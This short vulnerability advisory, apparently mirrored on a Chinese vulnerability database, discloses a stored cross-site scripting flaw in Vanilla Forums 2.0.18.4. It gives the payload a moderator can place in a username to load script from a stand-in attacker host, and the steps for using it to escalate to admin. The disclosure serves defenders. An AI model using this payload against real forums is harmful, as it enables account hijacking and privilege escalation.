https://cxsecurity.com/issue/WLB-2012050136
Vanilla 2.0.18.4 Cross Site Scripting
| 漏洞ID | 1047456 | 漏洞类型 | |
| 发布时间 | 2012-05-19 | 更新时间 | 2012-05-19 |
 CVE编号
|
N/A |  CNNVD-ID
|
N/A |
| 漏洞平台 | N/A | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Title: Vanilla Moderator Edit Account XSS Vulnerability
# Date: 18/5/12
# Author: Henry Hoggard
# Author URL: henryhoggard.co.uk
# Author Twitter: @henryhoggard
# Software: Vanilla Version 2.0.18.4
# http://http://vanillaforums.org
#############################################################
This is a very low risk vulnerability because it requires a certain level of privileges.
If a moderator is given the Edit User privilege then they can edit an accounts username and replace it with a malicious XSS string.
XSS:
<SCRIPT SRC=http://evil.tld/xss.js></SCRIPT>
Then send the target user to
http://vanillaforum.tld/index.php?p=/activity
This can be used to escalate privileges from moderator to admin
检索漏洞
开始时间
结束时间